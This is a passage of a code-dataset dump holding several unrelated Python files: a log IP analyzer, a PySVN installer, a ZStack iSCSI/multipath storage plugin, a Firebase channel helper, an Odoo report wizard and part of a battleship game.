Class/program4.py","file_name":"program4.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370897336","text":"import re\nimport collections\n\nsubnets = {}\nIPsList = []\nsubnetsList = []\n\nsecureRegex = \"\\n((([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9])\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9])\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9]))\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9]))\"\nlightRegex = \"\\n(([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\.[0-9]{1,3})\"\n\nlogFile = open('access.log')\nlog = ''.join(('\\n', logFile.read()))\n\nIPs=re.findall(r'\\n(([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\.[0-9]{1,3})', log)\n\nfor i in range(len(IPs)):\n isPresent = 0\n for j in range(len(IPsList)):\n if IPsList[j] == IPs[i][0]:\n isPresent = 1\n\n if (isPresent == 0):\n IPsList.append(IPs[i][0])\n subnetsList.append(IPs[i][1])\nprint(\"Unique IPs found: \"+ str(len(IPsList)))\n\n# subnets = dict(zip(subnetsList,IPsList))\nfor k,v in zip(subnetsList, IPsList):\n subnets.setdefault(k, []).append(v)\n\noutput = open('output.txt', 'w')\noutput.write(\"Found \" + str(len(IPsList)) + \" unique IPs (total: \" + str(len(IPs)) + \") and \" + str(len(subnets)) + \" \\24 subnets. \\r\\n\")\n\nfor subnet in subnets:\n output.write(\"%s\\n\" % subnet)\n for ip in subnets[subnet]:\n output.write(\"\\t%s\\n\" % ip)","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455374805","text":"#!/usr/bin/env python\n#\n# Simplifies installation of PySVN, working through platform and other\n# compatibility differences.\n#\n# By default, this will install a wheel for the latest version of PySVN.\n\nfrom __future__ import print_function, unicode_literals\n\nimport argparse\nimport atexit\nimport glob\nimport os\nimport platform\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nfrom subprocess import CalledProcessError\n\ntry:\n # Python 3\n from urllib.error import URLError\n from urllib.request import urlopen, urlretrieve\nexcept ImportError:\n # Python 2\n from urllib import urlretrieve\n from urllib2 import URLError, urlopen\n\ntry:\n import pip\nexcept ImportError:\n sys.stderr.write('Install pip for Python %s.%s and try again.\\n'\n % sys.version_info[:2])\n sys.exit(1)\n\ntry:\n import wheel\nexcept ImportError:\n sys.stderr.write('Install wheel for Python %s.%s and try again.\\n'\n % sys.version_info[:2])\n sys.exit(1)\n\n\nINDEX_URL = 'https://sourceforge.net/projects/pysvn/rss?path=/pysvn&limit=10'\nDOWNLOAD_URL_MASK = (\n 'https://sourceforge.net/projects/pysvn/files/pysvn/V%(version)s/'\n 'pysvn-%(version)s.tar.gz/download')\nVERSION_RE = \\\n re.compile(br'.*/files/pysvn/V(?P[0-9\\.-]+)/.*')\n\n\ncwd = None\ntemp_path = None\n_debug_mode = (os.environ.get('DEBUG_PYSVN_INSTALLER') == '1')\n\n\ndef destroy_temp():\n shutil.rmtree(temp_path)\n\n\ndef debug(msg):\n if _debug_mode:\n sys.stderr.write(msg)\n\n\ndef get_pysvn_version():\n try:\n data = urlopen(INDEX_URL).read()\n except URLError as e:\n sys.stderr.write('Unable to fetch PySVN downloads RSS feed: %s\\n' % e)\n sys.stderr.write('Tried to load feed from %s\\n' % INDEX_URL)\n sys.exit(1)\n\n m = VERSION_RE.search(data)\n\n if not m:\n sys.stderr.write('Unable to find latest PySVN version in RSS feed.\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n return m.groups('version')[0].decode('utf-8')\n\n\ndef fetch_pysvn(pysvn_version):\n url = DOWNLOAD_URL_MASK % {\n 'version': pysvn_version,\n }\n\n debug('PySVN URL: %s\\n' % url)\n\n tarball_path = os.path.join(temp_path, 'pysvn.tar.gz')\n\n try:\n urlretrieve(url, filename=tarball_path)\n except URLError as e:\n sys.stderr.write('Unable to fetch PySVN %s: %s\\n' % (pysvn_version, e))\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n return tarball_path\n\n\ndef extract_pysvn(tarball_path):\n with tarfile.open(tarball_path) as tar:\n tar.extractall(temp_path)\n\n try:\n return glob.glob(os.path.join(temp_path, 'pysvn-*'))[0]\n except IndexError:\n sys.stderr.write('Unable to find pysvn-* directory in tarball.\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n\ndef get_brew_prefix(package):\n try:\n path = (\n subprocess.check_output(['brew', '--prefix', package])\n .strip()\n .decode('utf-8')\n )\n debug('%s was found in brew: %s\\n' % (package, path))\n\n return path\n except CalledProcessError:\n debug('%s was not found in brew\\n' % package)\n return None\n\n\ndef build_pysvn(src_path, install=True):\n system = platform.system()\n\n os.chdir(src_path)\n\n # Locate the PyCXX Import version, so we can force its usage during\n # setup.py.\n import_path = os.path.join(src_path, 'Import')\n\n try:\n pycxx_dirname = glob.glob(os.path.join(import_path, 'pycxx*'))[0]\n except IndexError:\n sys.stderr.write('PySVN seems to be missing an Import/pycxx* '\n 'directory\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n pycxx_path = os.path.join(import_path, pycxx_dirname)\n\n # We need to patch setup.py to specify the --pycxx-dir parameter.\n setup_py_path = os.path.join(src_path, 'setup.py')\n\n with open(setup_py_path, 'r') as fp:\n setup_py = fp.read()\n\n config_token = 'setup.py configure'\n\n if config_token not in setup_py:\n sys.stderr.write(\"PySVN's setup.py can no longer be patched.\\n\")\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n config_args = ['--pycxx-dir=\"%s\"' % pycxx_path]\n\n if system == 'Darwin':\n debug('Enabling macOS framework support\\n')\n config_args.append('--link-python-framework-via-dynamic-lookup')\n\n # We want to include a few additional places to look for headers\n # and libraries. We'll start by seeing if Homebrew has some\n # information, and we'll then proceed to including the XCode versions.\n brew_svn_path = get_brew_prefix('subversion')\n brew_apr_path = get_brew_prefix('apr')\n brew_apr_util_path = get_brew_prefix('apr-util')\n\n extra_apr_include_paths = []\n extra_apr_lib_paths = []\n extra_apu_include_paths = []\n extra_svn_bin_paths = []\n extra_svn_include_paths = []\n extra_svn_lib_paths = []\n\n if brew_apr_path:\n apr_config_path = os.path.join(brew_apr_path, 'bin',\n 'apr-1-config')\n\n if os.path.exists(apr_config_path):\n extra_apr_include_paths.append(\n subprocess.check_output([apr_config_path, '--includedir'])\n .decode('utf-8').strip())\n\n brew_apr_prefix = (\n subprocess.check_output([apr_config_path, '--prefix'])\n .decode('utf-8').strip()\n )\n\n extra_apr_lib_paths.append(os.path.join(brew_apr_prefix,\n 'lib'))\n\n if brew_apr_util_path:\n apu_config_path = os.path.join(brew_apr_util_path, 'bin',\n 'apu-1-config')\n\n if os.path.exists(apu_config_path):\n extra_apu_include_paths.append(\n subprocess.check_output([apu_config_path, '--includedir'])\n .decode('utf-8').strip())\n\n if brew_svn_path and os.path.exists(brew_svn_path):\n # If SVN is installed from brew, we'll want to use those paths.\n extra_svn_bin_paths.append(os.path.join(brew_svn_path, 'bin'))\n extra_svn_include_paths.append(os.path.join(brew_svn_path,\n 'include',\n 'subversion-1'))\n extra_svn_lib_paths.append(os.path.join(brew_svn_path, 'lib'))\n\n # XCode bundle both APU directories under the same path.\n xcode_apr_path = (\n '/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk'\n '/usr/include/apr-1')\n extra_apr_include_paths.append(xcode_apr_path)\n extra_apu_include_paths.append(xcode_apr_path)\n\n debug('Extra APR include paths: %r\\n' % (extra_apr_include_paths,))\n debug('Extra APR lib paths: %r\\n' % (extra_apr_lib_paths,))\n debug('Extra APU include paths: %r\\n' % (extra_apu_include_paths,))\n debug('Extra SVN bin paths: %r\\n' % (extra_svn_bin_paths,))\n debug('Extra SVN include paths: %r\\n' % (extra_svn_include_paths,))\n debug('Extra SVN lib paths: %r\\n' % (extra_svn_lib_paths,))\n\n for path in extra_apr_include_paths:\n if os.path.exists(os.path.join(path, 'apr.h')):\n config_args.append('--apr-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_apr_lib_paths:\n if os.path.exists(os.path.join(path, 'libapr-1.dylib')):\n config_args.append('--apr-lib-dir=\"%s\"' % path)\n break\n\n for path in extra_apu_include_paths:\n if os.path.exists(os.path.join(path, 'apu.h')):\n config_args.append('--apu-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_bin_paths:\n if os.path.exists(os.path.join(path, 'svn')):\n config_args.append('--svn-bin-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_include_paths:\n if os.path.exists(os.path.join(path, 'svn_client.h')):\n config_args.append('--svn-inc-dir=\"%s\"' % path)\n break\n\n for path in extra_svn_lib_paths:\n if os.path.exists(os.path.join(path, 'libsvn_client-1.a')):\n config_args.append('--svn-lib-dir=\"%s\"' % path)\n break\n\n debug('Using configuration arguments: %r\\n' % (config_args,))\n\n setup_py = setup_py.replace(config_token,\n '%s %s' % (config_token,\n ' '.join(config_args)))\n\n with open(setup_py_path, 'w') as fp:\n fp.write(setup_py)\n\n if install:\n cmd_args = ['-m', 'pip', 'install', src_path]\n else:\n cmd_args = ['setup.py', 'bdist_wheel', '--dist-dir', cwd]\n\n return subprocess.call([sys.executable] + cmd_args)\n\n\ndef main():\n global cwd\n global temp_path\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--pysvn-version',\n default=os.environ.get('PYSVN_INSTALLER_VERSION'),\n help='A specific version of PySVN to install.')\n parser.add_argument('--file',\n default=os.environ.get('PYSVN_INSTALLER_SRC_FILE'),\n help='A specific PySVN source tarball to install.')\n parser.add_argument('--build-only',\n action='store_true',\n default=os.environ.get('PYSVN_INSTALLER_BUILD_ONLY',\n False),\n help=\"Build a wheel, but don't install it. The \"\n \"wheel will be stored in the current directory.\")\n\n args = parser.parse_args()\n\n cwd = os.getcwd()\n\n temp_path = tempfile.mkdtemp(suffix='.pysvn-install')\n atexit.register(destroy_temp)\n\n if args.file:\n tarball_path = args.file\n\n if not os.path.exists(tarball_path):\n sys.stderr.write('The provided PySVN tarball does not exist.\\n')\n sys.exit(1)\n else:\n if args.pysvn_version:\n pysvn_version = args.pysvn_version\n else:\n print('Looking up latest PySVN version...')\n pysvn_version = get_pysvn_version()\n\n if pysvn_version == '1.9.13':\n pysvn_version = '1.9.12'\n\n debug('PySVN %s\\n' % pysvn_version)\n\n print('Downloading PySVN %s...' % pysvn_version)\n tarball_path = fetch_pysvn(pysvn_version)\n\n print('Building PySVN...')\n src_path = extract_pysvn(tarball_path)\n retcode = build_pysvn(src_path, install=not args.build_only)\n\n if retcode == 0:\n print()\n\n if args.build_only:\n print('PySVN is built. The wheel is in the current directory.')\n else:\n print('PySVN is installed.')\n else:\n sys.stderr.write('\\n')\n sys.stderr.write('PySVN failed to install. You might be missing some '\n 'dependencies.\\n')\n\n system = platform.system()\n\n if system == 'Darwin':\n sys.stderr.write('On macOS, run:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ xcode-select --install\\n')\n sys.stderr.write(' $ brew install subversion\\n')\n sys.stderr.write('\\n')\n sys.stderr.write('Note that you will need to install Homebrew '\n 'from https://brew.sh/\\n')\n elif system == 'Linux':\n if sys.version_info[0] == 3:\n pkg_prefix = 'python3'\n else:\n pkg_prefix = 'python'\n\n sys.stderr.write('On Linux, you will need Python development '\n 'headers and\\n')\n sys.stderr.write('Subversion development libraries.\\n')\n sys.stderr.write('\\n')\n sys.stderr.write('For Ubuntu:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ sudo apt-get install %s-dev\\n'\n % pkg_prefix)\n sys.stderr.write(' $ sudo apt-get build-dep %s-svn\\n'\n % pkg_prefix)\n sys.stderr.write('\\n')\n sys.stderr.write('For RHEL/CentOS:\\n')\n sys.stderr.write('\\n')\n sys.stderr.write(' $ sudo yum install %s-devel '\n 'subversion-devel\\n'\n % pkg_prefix)\n\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":12741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571924930","text":"import random\n\nfrom kvmagent import kvmagent\n\nfrom zstacklib.utils import lock\nfrom zstacklib.utils import jsonobject\nfrom zstacklib.utils import http\nfrom zstacklib.utils import log\nfrom zstacklib.utils import shell\nfrom zstacklib.utils import lvm\nfrom zstacklib.utils import bash\nfrom zstacklib.utils import linux\n\nlogger = log.get_logger(__name__)\n\n\nclass RetryException(Exception):\n pass\n\n\nclass AgentRsp(object):\n def __init__(self):\n self.success = True\n self.error = None\n\n\nclass IscsiTargetStruct(object):\n iscsiLunStructList = None # type: List[IscsiLunStruct]\n\n def __init__(self):\n self.iqn = \"\"\n self.iscsiLunStructList = []\n\n\nclass IscsiLunStruct(object):\n def __init__(self):\n self.wwids = []\n self.vendor = \"\"\n self.model = \"\"\n self.wwn = \"\"\n self.serial = \"\"\n self.hctl = \"\"\n self.type = \"\"\n self.path = \"\"\n self.size = \"\"\n self.multipathDeviceUuid = \"\"\n\n\nclass IscsiLoginRsp(AgentRsp):\n iscsiTargetStructList = None # type: List[IscsiTargetStruct]\n\n def __init__(self):\n self.iscsiTargetStructList = []\n\n\nclass StorageDevicePlugin(kvmagent.KvmAgent):\n\n ISCSI_LOGIN_PATH = \"/storagedevice/iscsi/login\"\n ISCSI_LOGOUT_PATH = \"/storagedevice/iscsi/logout\"\n FC_SCAN_PATH = \"/storage/fc/scan\"\n MULTIPATH_ENABLE_PATH = \"/storage/multipath/enable\"\n\n def start(self):\n http_server = kvmagent.get_http_server()\n http_server.register_async_uri(self.ISCSI_LOGIN_PATH, self.iscsi_login)\n http_server.register_async_uri(self.ISCSI_LOGOUT_PATH, self.iscsi_logout)\n http_server.register_async_uri(self.FC_SCAN_PATH, self.scan_sg_devices)\n http_server.register_async_uri(self.MULTIPATH_ENABLE_PATH, self.enable_multipath)\n\n def stop(self):\n pass\n\n @lock.lock('iscsiadm')\n @kvmagent.replyerror\n @bash.in_bash\n def iscsi_login(self, req):\n cmd = jsonobject.loads(req[http.REQUEST_BODY])\n rsp = IscsiLoginRsp()\n\n @linux.retry(times=5, sleep_time=1)\n def discovery_iscsi(iscsiServerIp, iscsiServerPort):\n r, o, e = bash.bash_roe(\n \"timeout 10 iscsiadm -m discovery --type sendtargets --portal %s:%s\" % (\n iscsiServerIp, iscsiServerPort))\n if r != 0:\n raise RetryException(\"can not discovery iscsi portal %s:%s\" % (iscsiServerIp, iscsiServerPort))\n return [i.strip().split(\" \")[-1] for i in o.splitlines()]\n\n @linux.retry(times=5, sleep_time=random.uniform(0.1, 3))\n def wait_iscsi_mknode(iscsiServerIp, iscsiServerPort, iqn):\n disks_by_dev = bash.bash_o(\"ls /dev/disk/by-path | grep %s:%s | grep %s\" % (iscsiServerIp, iscsiServerPort, iqn)).strip().splitlines()\n sid = bash.bash_o(\"iscsiadm -m session | grep %s:%s | grep %s | awk '{print $2}'\" % (iscsiServerIp, iscsiServerPort, iqn)).strip(\"[]\\n \")\n disks_by_iscsi = bash.bash_o(\"iscsiadm -m session -P 3 --sid=%s | grep Lun\" % sid).strip().splitlines()\n if len(disks_by_dev) != len(disks_by_iscsi):\n raise RetryException(\"disks number by /dev/disk not equal to iscsiadm\")\n\n iqns = cmd.iscsiTargets\n if iqns is None or len(iqns) == 0:\n try:\n iqns = discovery_iscsi(cmd.iscsiServerIp, cmd.iscsiServerPort)\n except Exception as e:\n current_hostname = shell.call('hostname')\n current_hostname = current_hostname.strip(' \\t\\n\\r')\n rsp.error = \"login iscsi server %s:%s on host %s failed, because %s\" % \\\n (cmd.iscsiServerIp, cmd.iscsiServerPort, current_hostname, e.message)\n rsp.success = False\n return jsonobject.dumps(rsp)\n\n if iqns is None or len(iqns) == 0:\n rsp.iscsiTargetStructList = []\n return jsonobject.dumps(rsp)\n\n for iqn in iqns:\n t = IscsiTargetStruct()\n t.iqn = iqn\n if cmd.iscsiChapUserName and cmd.iscsiChapUserPassword:\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.authmethod --value=CHAP' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.username --value=%s' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort, cmd.iscsiChapUserName))\n bash.bash_o(\n 'iscsiadm --mode node --targetname \"%s\" -p %s:%s --op=update --name node.session.auth.password --value=%s' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort, cmd.iscsiChapUserPassword))\n bash.bash_o('iscsiadm --mode node --targetname \"%s\" -p %s:%s --login' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n try:\n wait_iscsi_mknode(cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)\n finally:\n if bash.bash_r(\"ls /dev/disk/by-path | grep %s:%s | grep %s\" % (cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)) != 0:\n rsp.iscsiTargetStructList.append(t)\n else:\n disks = bash.bash_o(\"ls /dev/disk/by-path | grep %s:%s | grep %s\" % (cmd.iscsiServerIp, cmd.iscsiServerPort, iqn)).strip().splitlines()\n for d in disks:\n t.iscsiLunStructList.append(self.get_disk_info_by_path(d.strip()))\n rsp.iscsiTargetStructList.append(t)\n\n return jsonobject.dumps(rsp)\n\n @staticmethod\n def get_disk_info_by_path(path):\n # type: (str) -> IscsiLunStruct\n abs_path = bash.bash_o(\"readlink -e /dev/disk/by-path/%s\" % path).strip()\n candidate_struct = lvm.get_device_info(abs_path.split(\"/\")[-1])\n lun_struct = IscsiLunStruct()\n lun_struct.path = path\n lun_struct.size = candidate_struct.size\n lun_struct.hctl = candidate_struct.hctl\n lun_struct.serial = candidate_struct.serial\n lun_struct.model = candidate_struct.model\n lun_struct.vendor = candidate_struct.vendor\n lun_struct.type = candidate_struct.type\n lun_struct.wwn = candidate_struct.wwn\n lun_struct.wwids = candidate_struct.wwids\n if lvm.is_slave_of_multipath(abs_path):\n lun_struct.type = \"mpath\"\n mpath_wwid = bash.bash_o(\"multipath -l %s | egrep ^mpath | awk '{print $2}'\" % abs_path).strip(\"() \\n\")\n lun_struct.wwids = [mpath_wwid]\n return lun_struct\n\n @lock.lock('iscsiadm')\n @kvmagent.replyerror\n def iscsi_logout(self, req):\n cmd = jsonobject.loads(req[http.REQUEST_BODY])\n rsp = AgentRsp()\n\n iqns = cmd.iscsiTargets\n if iqns is None or len(iqns) == 0:\n iqns = shell.call(\"timeout 10 iscsiadm -m discovery --type sendtargets --portal %s:%s | awk '{print $2}'\" % (\n cmd.iscsiServerIp, cmd.iscsiServerPort)).strip().splitlines()\n\n if iqns is None or len(iqns) == 0:\n rsp.iscsiTargetStructList = []\n return jsonobject.dumps(rsp)\n\n for iqn in iqns:\n shell.call('timeout 10 iscsiadm --mode node --targetname \"%s\" -p %s:%s --logout' % (\n iqn, cmd.iscsiServerIp, cmd.iscsiServerPort))\n\n return jsonobject.dumps(rsp)\n\n @kvmagent.replyerror\n @bash.in_bash\n def scan_sg_devices(self, req):\n rsp = AgentRsp()\n bash.bash_roe(\"sg_scan -i\")\n return jsonobject.dumps(rsp)\n\n @kvmagent.replyerror\n @bash.in_bash\n @linux.retry(times=3, sleep_time=1)\n def enable_multipath(self, req):\n rsp = AgentRsp()\n bash.bash_roe(\"modprobe dm-multipath\")\n bash.bash_roe(\"modprobe dm-round-robin\")\n bash.bash_roe(\"mpathconf --enable --with_multipathd y\")\n if not lvm.is_multipath_running:\n raise RetryException(\"multipath still not running\")\n return jsonobject.dumps(rsp)","sub_path":"kvmagent/kvmagent/plugins/storage_device.py","file_name":"storage_device.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"241637596","text":"import base64\nimport logging\nimport string\nimport time\nimport uuid\n\nfrom .credentials import build_token, decode_token\nfrom .firebase import Firebase\n\nfrom video_src.constants import project_name\n\n_client = None\n_logger = logging.getLogger(\"firechannel.channel\")\n\n#: Valid client id characters.\nVALID_CHARS = set(string.ascii_letters + string.digits + \"-_\")\n\ndef get_client():\n \"\"\"Get the current global client instance.\n\n If one doesn't currently exist, a default client will be created\n and returned on GAE and a RuntimeError will be raised everywhere\n else.\n\n Returns:\n Firebase\n \"\"\"\n global _client\n if _client is None:\n _client = _client = Firebase(project_name)\n\n return _client\n\n\ndef set_client(client):\n \"\"\"Set the global client instance.\n\n Parameters:\n client(Firebase)\n \"\"\"\n global _client\n _client = client\n\n\ndef decode_client_id(token, firebase_client=None):\n \"\"\"Given a token, decode and return its client id.\n \"\"\"\n client = firebase_client or get_client()\n return decode_token(client.credentials, token)[\"uid\"]\n\n\ndef _validate_client_id(client_id, firebase_client=None):\n if not isinstance(client_id, basestring):\n raise TypeError(\"client_id must be a string\")\n\n elif client_id.count(\".\") == 2:\n return decode_client_id(client_id, firebase_client=firebase_client)\n\n elif len(client_id) > 64:\n raise ValueError(\"client_id must be at most 64 characters long\")\n\n elif set(client_id) - VALID_CHARS:\n raise ValueError(\"client_id contains invalid characters\")\n\n return client_id\n\n\ndef _validate_duration(duration_minutes):\n if not isinstance(duration_minutes, int):\n raise TypeError(\"duration_minutes must be an integer\")\n\n elif not (1 <= duration_minutes <= 1440):\n raise ValueError(\"duration_minutes must be a value between 1 and 1440\")\n\n\ndef create_channel(client_id=None, duration_minutes=60, firebase_client=None):\n \"\"\"Create a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n duration_minutes(int): An int specifying the number of minutes\n for which the returned should be valid.\n firebase_client(Firebase): The Firebase client instance to\n use. This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id or duration_minutes have invalid types.\n ValueError: When client_id or duration_minutes have invalid values.\n\n Returns:\n str: A token that the client can use to connect to the channel.\n \"\"\"\n if client_id is None:\n client_id = str(uuid.uuid4())\n\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n _validate_duration(duration_minutes)\n\n # Delete the channel so any old data isn't sent to the client.\n delete_channel(client_id, firebase_client=client)\n return build_token(client.credentials, {\"uid\": client_id}, duration_minutes)\n\n\ndef delete_channel(client_id, firebase_client=None):\n \"\"\"Delete a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n firebase_client(Firebase): The Firebase client instance to\n use. This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id has an invalid type.\n ValueError: When client_id has an invalid value.\n \"\"\"\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n client.delete(u\"firechannels/{}.json\".format(client_id))\n _logger.debug(\"Deleted channel %r.\", client_id)\n\n\ndef send_message(client_id, message, firebase_client=None):\n \"\"\"Send a message to a channel.\n\n Parameters:\n client_id(str): A string to identify this channel in Firebase.\n message(str): A string representing the message to send.\n firebase_client(Firebase): The Firebase client instance to\n use. This can be omitted on AppEngine.\n\n Raises:\n FirebaseError: When Firebase is down.\n TypeError: When client_id has an invalid type.\n ValueError: When client_id has an invalid value.\n \"\"\"\n assert isinstance(message, basestring), \"messages must be strings\"\n client = firebase_client or get_client()\n client_id = _validate_client_id(client_id, firebase_client=client)\n client.patch(u\"firechannels/{}.json\".format(client_id), {\n \"message\": base64.b64encode(message),\n \"timestamp\": int(time.time() * 1000),\n })\n\n\ndef find_all_expired_channels(max_age=3600, firebase_client=None):\n \"\"\"Returns the ids of any channels to which the last message was\n sent over some number of seconds ago.\n\n Parameters:\n max_age(int): Channels that were last sent a message longer than\n this value ago are returned. Defaults to an hour.\n \"\"\"\n client = firebase_client or get_client()\n cutoff = (time.time() - max_age) * 1000\n channels = client.get(\"firechannels.json\") or {}\n for client_id, channel in channels.items():\n if not isinstance(channel, dict):\n yield client_id\n continue\n\n timestamp = channel.get(\"timestamp\", 0)\n if timestamp <= cutoff:\n yield client_id\n","sub_path":"firechannel/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581621060","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields\n\n\nclass GrpCreateReportWizard(models.TransientModel):\n _name = 'grp.create.report.wizard'\n\n name = fields.Many2one('account.report.group', required=1, readonly=1)\n balance_id = fields.Many2one('dl.report.balance', string='Balance', required=True)\n date_debut = fields.Date(related='balance_id.date_debut', string=u'Date début', readonly=1)\n date_fin = fields.Date(related='balance_id.date_fin', string=u'Date fin', readonly=1)\n exercice = fields.Char(related='balance_id.exercice', string='Exercice', readonly=1)\n devise_id = fields.Many2one(related='balance_id.devise_id', string=u'Unité d\\'affichage', readonly=1)\n valid = fields.Boolean('Créer les rapports juste pour les modèles validés')\n\n def action_create(self):\n self.name.report_ids.unlink()\n for model in self.name.model_ids:\n report = self.env['dl.account.report.report'].create({\n 'model_id' : model.id,\n 'balance_id' : self.balance_id.id,\n 'company_d' : self.env.user.company_id.id,\n 'name' : model.name,\n 'code' : model.code + '-' + self.exercice\n })\n if not model.specifique:\n report.update_all()\n # else:\n # if model.specifique_rep == '7_immo_cede':\n # report.update_specifique7()\n","sub_path":"l10n_dz_reports/wizard/grp_create_report.py","file_name":"grp_create_report.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621563685","text":"def direction_repr_str(direction_class, direction):\n \"\"\"\n Converts a direction to string.\n :param direction: The direction to convert to string. Should be one of the\n constants of the Direction class ([UP, DOWN, LEFT, RIGHT, NOT_MOVING)\n :return: A string representation for a valid direction input or the string\n 'UNKNOWN' if the input direction is not valid.\n \"\"\"\n if direction == direction_class.NOT_MOVING:\n return 'NOT MOVING'\n elif direction == direction_class.UP:\n return 'UP'\n elif direction == direction_class.DOWN:\n return 'DOWN'\n elif direction == direction_class.LEFT:\n return 'LEFT'\n elif direction == direction_class.RIGHT:\n return 'RIGHT'\n else:\n return 'UNKNOWN'\n\n\n\n############################################################\n# Imports\n############################################################\nimport game_helper as gh\n############################################################\n# Class definition\n############################################################\n\n\nclass Game:\n \"\"\"\n A class representing a battleship game.\n A game is composed of ships that are moving on a square board and a user\n which tries to guess the locations of the ships by guessing their\n coordinates.\n \"\"\"\n\n def __init__(self, board_size, ships):\n \"\"\"\n Initialize a new Game object.\n :param board_size: Length of the side of the game-board\n :param ships: A list of ships that participate in the game.\n :return: A new Game object.\n \"\"\"\n self.__board_size = board_size\n self.__ships = ships\n self.__damaged_ships = []\n self.__terminated_ships = []\n self.__bomb_on_board = {}\n self.__healthy_ships = []\n self.__hit_ship_cells = []\n\n def __play_one_round(self):\n \"\"\"\n Note - this function is here to guide you and it is *not mandatory*\n to implement it. The logic defined by this function must be implemented\n but if you wish to do so in another function (or some other functions)\n it is ok.\n\n Te function runs one round of the game :\n 1. Get user coordinate choice for bombing.\n 2. Move all game's ships.\n 3. Update all ships and bombs.\n 4. Report to the user the result of current round (number of hits and\n terminated ships)\n :return:\n (some constant you may want implement which represents) Game status :\n GAME_STATUS_ONGOING if there are still ships on the board or\n GAME_STATUS_ENDED otherwise.\n \"\"\"\n new_bomb = gh.get_target(self.__board_size)\n self.__bomb_on_board[new_bomb] = 4\n self.ship_mover()\n self.damaged_ships()\n self.bombs_life_time()\n hits = self.last_hit(new_bomb)\n self.remove_items(hits[0])\n self.not_damaged_pos()\n self.damaged_pos()\n terminations = self.terminated_ships()\n gh.report(gh.board_to_string(self.__board_size, hits[0],\n self.__bomb_on_board,\n self.__hit_ship_cells,\n self.__healthy_ships))\n gh.report_turn(hits[1], terminations)\n\n def __repr__(self):\n \"\"\"\n Return a string representation of the board's game\n :return: A tuple converted to string. The tuple should contain (maintain\n the following order):\n 1. Board's size.\n 2. A dictionary of the bombs found on the board\n {(pos_x, pos_y) : remaining turns}\n For example :\n {(0, 1) : 2, (3, 2) : 1}\n 3. A list of the ships found on the board (each ship should be\n represented by its __repr__ string).\n \"\"\"\n game_tuple = (self.__board_size, self.__bomb_on_board, self.__ships)\n return str(game_tuple)\n\n def play(self):\n \"\"\"\n The main driver of the Game. Manages the game until completion.\n completion.\n :return: None\n \"\"\"\n gh.report_legend()\n all_ships_coordinates = []\n for ship in self.__ships:\n all_ships_coordinates += ship.coordinates()\n print(gh.board_to_string(self.__board_size, [], self.__bomb_on_board,\n [], all_ships_coordinates))\n while len(self.__ships) != 0:\n self.__play_one_round()\n gh.report_gameover()\n\n def ship_mover(self):\n \"\"\"\n move the ships using move() in class ship\n \"\"\"\n for ship in self.__ships:\n ship.move()\n\n def damaged_ships(self):\n for ship in self.__ships:\n if len(ship.damaged_cells()) != 0:\n self.__damaged_ships.append(ship)\n\n def terminated_ships(self):\n \"\"\"\n remove ships that were hit in all of their cells\n :return: terminated_counter - num of terminated ships\n \"\"\"\n terminated_counter = 0\n for ship in self.__ships:\n if ship.terminated():\n terminated_counter += 1\n self.__terminated_ships.append(ship)\n self.__ships.remove(ship)\n return terminated_counter\n\n def bombs_life_time(self):\n \"\"\"\n count down three turns for a single bomb and update\n self.__bomb_on_board\n 